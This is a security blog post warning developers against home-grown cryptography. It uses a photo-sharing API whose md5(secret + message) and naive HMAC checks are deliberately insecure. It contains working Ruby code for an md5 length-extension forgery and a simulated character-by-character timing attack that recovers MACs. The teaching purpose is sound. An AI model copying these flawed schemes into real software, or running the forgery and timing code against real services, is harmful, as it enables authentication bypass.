You are dangerously bad at cryptography | Happy Bear Software | Web Application Development
- Unconscious incompetence – When you don’t know how bad you are or what you don’t know.
- Conscious incompetence – When you know how bad you are and know what steps you need to take to get better.
- Conscious competence – When you’re good and you know it (this is fun!)
- Unconscious competence – When you’re so good you don’t know it anymore.
We all start at stage one whether we like it or not. The key to progressing from
stage one to stage two in any subject is to make lots of mistakes and get
feedback. If you’re getting feedback, you begin to create a picture of what you
got right, what you got wrong and what you need to do better next time.
Cryptography is perilous because you get no feedback when you mess up. For
the average developer, one block of random base 64 encoded bytes is as good as any
other.
You can get good at programming by accident. If your code doesn’t compile,
doesn’t do what you intended it to or has easily observable bugs, you get
immediate feedback, you fix it and you make it better next time.
You cannot get good at cryptography by accident. Unless you put time and effort
into reading about and implementing exploits, your home-grown cryptography based
security mechanisms don’t stand much of a chance against real-world attacks.
Unless you pay a security expert who knows how to break cryptography-based
security mechanisms, you have no way of knowing that your code is insecure.
Attackers who bypass your security mechanism aren’t going to help you with this
either (their best case is bypassing it without you ever finding out).
Take a look at some examples of misused crypto below. Ask yourself, if you
hadn’t read this post, would you have caught these errors in real life?
Authenticating the API for your photo sharing website
Message Authentication with md5 + secret
Once upon a time, a photo sharing site authenticated its API with the following
scheme:
- Users have the following two credentials:
  - A public user id that they use to identify themselves (safe to send in the clear)
  - A shared secret that they use to sign messages (must be kept private)
- The user makes API requests over HTTP/HTTPS (it doesn’t matter). Destructive
  changes are made using a POST/GET request with specific parameters (e.g.
  { action: create, name: ‘my-new-photo’ }).
- To authenticate the message, the user sends their user id as a parameter, and
  then signs the message with their secret key. The signature is the md5 of
  the shared secret concatenated with the key-value pairs.
To check that the client is the user he claims to be, the server
generates the signature from the request parameters and the secret key it has on
file for that user.
The code for this could be:
```ruby
# CLIENT SIDE
require 'openssl'

## Our user credentials
user_id = '42'
secret = 'OKniSLvKZFkOhlo16RoTDg0D2v1QSBQvGll1hHflMeO77nWesPW+YiwUBy5a'

## The request params we want to send
params = { foo: 'bar', bar: 'baz', user_id: user_id }

## Build the MAC
message = params.map { |key, value| "#{key}:#{value}" }.join('&')
params[:mac] = OpenSSL::Digest::MD5.hexdigest(secret + message)

## Then send the request via something like...
HTTP.post 'api.example.com/v3', params

# SERVER SIDE

## Grab the user credentials out of the DB
user = User.find(params[:user_id])
secret = user.secret

## Get the MAC out of the request params
challenge_mac = params.delete(:mac)

## Calculate the MAC using the same method the client uses
message = params.map { |key, value| "#{key}:#{value}" }.join('&')
calculated_mac = OpenSSL::Digest::MD5.hexdigest(secret + message)

## Compare the challenge and calculated MAC
if challenge_mac == calculated_mac
  # The user authenticates successfully, do what they ask
else
  # The user is not authenticated, fail
end
```
With a basic understanding of how md5 works, this is a perfectly reasonable
implementation of API authentication. That looks secure, right? Are you
sure?
It turns out that this scheme is vulnerable to what’s called a length
extension attack.
Briefly:
- If you know the value of md5('foo'), due to the way md5 works, it’s trivial
  to compute md5('foobar') without knowing the prefix ‘foo’. (Strictly, the
  extended input is ‘foo’, then md5’s own padding bytes, then ‘bar’, and you
  need the length of the prefix, which can be guessed.)
- So if you know the value of md5('secretfoo:bar'), it’s trivial to compute
  md5('secretfoo:bar&bar:baz') without knowing the prefix ‘secret’.
- This means that as long as you have one example of a signed message, you can
  forge signatures for that message plus any arbitrary request parameters you
  like and they will authenticate under the above described scheme.
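To make the steps above concrete, here is a minimal sketch of a length extension against `md5(secret + message)`. It re-implements md5's compression function only so that hashing can be resumed from a known digest. The helper names (`md5_padding`, `md5_compress`, `md5_resume`, `extend_mac`), the sample secret and the `&action:delete` extension are all made up for illustration, and the attacker is assumed to know (or guess) the secret's length.

```ruby
require 'digest'

MASK = 0xffffffff
MD5_INIT = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476].freeze
SHIFTS = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 +
          [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4).freeze
SINES = (0...64).map { |i| (Math.sin(i + 1).abs * 2**32).floor }.freeze

# The padding md5 appends to any input that is byte_len bytes long.
def md5_padding(byte_len)
  zeros = (55 - byte_len) % 64
  ([0x80] + [0] * zeros).pack('C*') + [byte_len * 8].pack('Q<')
end

# One round of md5's compression function over a single 64-byte block.
def md5_compress(state, block)
  m = block.unpack('V16')
  a, b, c, d = state
  64.times do |i|
    f, g = case i / 16
           when 0 then [(b & c) | (~b & d), i]
           when 1 then [(d & b) | (~d & c), (5 * i + 1) % 16]
           when 2 then [b ^ c ^ d, (3 * i + 5) % 16]
           else        [c ^ (b | ~d), (7 * i) % 16]
           end
    f = (f + a + SINES[i] + m[g]) & MASK
    rotated = ((f << SHIFTS[i]) | (f >> (32 - SHIFTS[i]))) & MASK
    a, d, c, b = d, c, b, (b + rotated) & MASK
  end
  state.zip([a, b, c, d]).map { |s, v| (s + v) & MASK }
end

# Continue hashing `data` from `state`, as if `bytes_already_hashed`
# bytes (a multiple of 64) had already been processed.
def md5_resume(state, data, bytes_already_hashed)
  padded = data.b + md5_padding(bytes_already_hashed + data.bytesize)
  padded.bytes.each_slice(64) { |blk| state = md5_compress(state, blk.pack('C*')) }
  state.pack('V4').unpack1('H*')
end

# Attacker's view: a valid MAC, the message it covers, and the secret's length.
def extend_mac(known_mac, message, secret_len, extension)
  glue = md5_padding(secret_len + message.bytesize)
  state = [known_mac].pack('H*').unpack('V4')
  hashed = secret_len + message.bytesize + glue.bytesize
  [message.b + glue + extension.b, md5_resume(state, extension, hashed)]
end

secret  = 'not-known-to-the-attacker' # hypothetical; only its length is used below
message = 'foo:bar&user_id:42'
mac     = Digest::MD5.hexdigest(secret + message)

forged_message, forged_mac =
  extend_mac(mac, message, secret.bytesize, '&action:delete')

# True when the server-side md5(secret + message) check accepts the forgery.
puts forged_mac == Digest::MD5.hexdigest(secret.b + forged_message)
```

The forged message contains md5's padding bytes between the original parameters and the appended ones, so whether a given server parses it the way the attacker wants depends on its parameter parser.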
Any developer who didn’t know about this beforehand would have easily been
caught out. The developers at Flickr, Vimeo and Remember the Milk
rolled this out to production.
The point isn’t that you should know about every esoteric
detail of the internals of cryptographic functions. The point is there are a
million ways to mess up cryptography, so don’t touch it.
Not convinced? OK, let’s try fixing this example and see if we can make it
secure…
Message Authenticating with HMAC
You hear about this security vulnerability via your friendly neighbourhood
whitehat and he recommends that you use a Hash-based Message Authentication
Code or HMAC to authenticate your API requests.
Great! HMACs are designed for our use case. This is a drop-in replacement for
what you were doing to verify the signature before. Our server verification code
can now look like this:
```ruby
require 'openssl'

## Grab the user credentials out of the DB
user = User.find(params[:user_id])
secret = user.secret

## Get the MAC out of the request params
challenge_hmac = params.delete(:hmac)

## Calculate the HMAC
## We'll do the same thing on the client when we generate the challenge
message = params.map { |key, value| "#{key}:#{value}" }.join('&')
calculated_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message)

## Compare the challenge and calculated MAC
if challenge_hmac == calculated_hmac
  # The user authenticates successfully, do what they ask
else
  # The user is not authenticated, fail
end
```
That looks secure, right? Are you sure?
It turns out that the verification code above is vulnerable to a timing
attack that allows you to guess the correct MAC for a given message.
Briefly:
- For a given message, send it with an HMAC made up of one repeated
  character. Do this once for each ASCII char, e.g. ‘aaaa…’, ‘bbbb…’ etc.
- Measure the time each request takes to complete. Since string equality takes a
  tiny bit longer to complete when the first char matches, the message that
  takes the longest to return will have the correct first character.
- Smooth out noise from latency in two ways:
  - Run a couple of hundred or thousand requests for each guess to get an
    average time.
  - Run your timing attack code from within the same data centre. If you’re
    having trouble determining the data centre, in the worst case you can spin
    up a box at each of the major providers and find out which box takes
    significantly less time to ping the target server.
- Once you’ve determined the first character, repeat for the second by changing
  the second char onwards, e.g. if ‘x’ is the first char, try ‘xaaa…’,
  ‘xbbb…’ and so on.
- Keep going until you have the whole HMAC.
Using the above defined technique, you can reliably determine the HMAC of any
message you want to send to the API and authenticate successfully.
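The loop described above can be sketched as a local simulation. To keep it deterministic, the hypothetical `naive_compare` stands in for the server and reports how many characters it examined instead of a wall-clock time. A real attack would have to average many noisy network timings to get the same signal. All names here are illustrative, and the guesses are limited to hex characters because the scheme uses a hex digest.

```ruby
require 'openssl'

HEX_CHARS = '0123456789abcdef'.chars.freeze

# Stand-in for the vulnerable server: compares like a naive string equality,
# stopping at the first mismatch. Returns [authenticated?, chars_examined],
# where chars_examined is our proxy for how long the request took.
def naive_compare(guess, actual)
  steps = 0
  guess.each_char.with_index do |char, i|
    steps += 1
    return [false, steps] if char != actual[i]
  end
  [guess.length == actual.length, steps]
end

# Recover a MAC of the given length one character at a time.
# The block plays the role of "send a request and time it".
def recover_mac(length, &oracle)
  known = +''
  (length - 1).times do
    filler = '0' * (length - known.length - 1)
    # The correct character makes the comparison run at least one step longer.
    known << HEX_CHARS.max_by { |c| oracle.call(known + c + filler).last }
  end
  # Timing cannot separate the final character; a successful login does.
  known + HEX_CHARS.find { |c| oracle.call(known + c).first }
end

# Hypothetical server-side secret and message.
server_mac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'),
                                     'server-side-secret',
                                     'action:delete&user_id:42')

recovered = recover_mac(server_mac.length) { |guess| naive_compare(guess, server_mac) }
puts recovered == server_mac
```

The attacker never sees the secret here. Every guess costs one request, so a 32-character hex MAC falls in at most 32 × 16 guesses (times however many samples each guess needs) rather than 16^32.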
Again, perhaps you didn’t know about timing attacks and you’re not expected to.
The point isn’t that you should have known the details of specific
vulnerabilities and watched out for them. The point is that there are a
million ways to mess up cryptography, so don’t touch it.
All the same, let’s go ahead and try to make this more secure…
Verifying HMACs in a time insensitive way
You get around timing attacks by comparing the sent and computed MAC in a
time-insensitive way. This means you can’t rely on your programming language’s
built-in string equality operator, as it will return as soon as it finds
a single character difference.
To compare strings, we can take advantage of the fact that any byte XORed with
itself is 0. All we have to do is XOR each byte from string A with the
corresponding byte from string B, combine the resulting bytes (a sum or a
bitwise OR both work) and return true if the result is 0, false otherwise. In
Ruby, that might look like this:
```ruby
require 'openssl'

## Time insensitive string equality function
def secure_equals?(a, b)
  return false if a.bytesize != b.bytesize
  # OR together the XOR of every byte pair; the result is 0 only if all pairs match
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) } == 0
end

## Grab the user credentials out of the DB
user = User.find(params[:user_id])
secret = user.secret

## Get the MAC out of the request params
challenge_hmac = params.delete(:hmac)

## Calculate the HMAC
## We'll do the same thing on the client when we generate the challenge
message = params.map { |key, value| "#{key}:#{value}" }.join('&')
calculated_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message)

## Compare the challenge and calculated MAC
if secure_equals?(challenge_hmac, calculated_hmac)
  # The user authenticates successfully, do what they ask
else
  # The user is not authenticated, fail
end
```
That looks secure, right? Are you sure?
I doubt it. It marks the edge of my knowledge in terms of potential attack
vectors on this sort of scheme, but I’m not convinced that there’s no way to
break it.
Save yourself the trouble. Don’t use cryptography. It is plutonium. There are
millions of ways to mess it up and precious few ways of getting it right.
P.S. If you must verify HMACs by hand and you have activesupport handy, you’ll get that
time-insensitive comparison from using ActiveSupport::MessageVerifier. Don’t
code it from scratch, and for crying out loud don’t copy-paste my implementation above.
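If activesupport isn’t around, one option that avoids hand-rolling the comparison is the `OpenSSL.secure_compare` helper in Ruby’s bundled openssl library. The sketch below assumes Ruby 2.7 or later, where that helper is available. The `valid_hmac?` wrapper and its arguments are hypothetical names, and this is an illustration of leaning on a library, not a vetted authentication scheme.

```ruby
require 'openssl'

# Hypothetical wrapper: recompute the HMAC the same way the article's server
# code does, then let the library do the time-insensitive comparison.
def valid_hmac?(secret, message, challenge_hmac)
  expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message)
  OpenSSL.secure_compare(expected, challenge_hmac.to_s)
end

secret  = 'example-shared-secret' # placeholder value
message = 'bar:baz&foo:bar&user_id:42'
good    = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message)

puts valid_hmac?(secret, message, good)     # a correctly signed request
puts valid_hmac?(secret, message, 'a' * 32) # a guessed MAC
```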
P.P.S. Still not convinced? Do the Matasano Crypto Challenges and see if that
doesn’t change your mind. I’m not half way through and I’ve already had to get
in touch with two former clients to fix their broken crypto.
Read this article in Russian, kindly translated by Dmitry Cherniachenko.